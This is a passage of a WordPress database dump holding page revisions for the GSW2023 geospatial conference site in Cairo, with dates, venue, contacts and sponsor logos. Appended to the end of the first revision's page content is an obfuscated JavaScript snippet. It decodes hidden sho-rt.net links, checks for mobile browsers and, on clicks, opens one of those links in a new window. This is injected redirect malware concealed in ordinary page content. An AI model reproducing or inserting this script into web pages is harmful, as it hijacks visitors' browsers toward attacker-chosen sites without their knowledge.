css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:14:57','2023-08-16 03:14:57','',3066,'https://gsw2023.com/?p=5286',0,'revision','',0),
(5287,1,'2023-08-16 03:15:14','2023-08-16 03:15:14','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155606140{margin-top: 60px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" 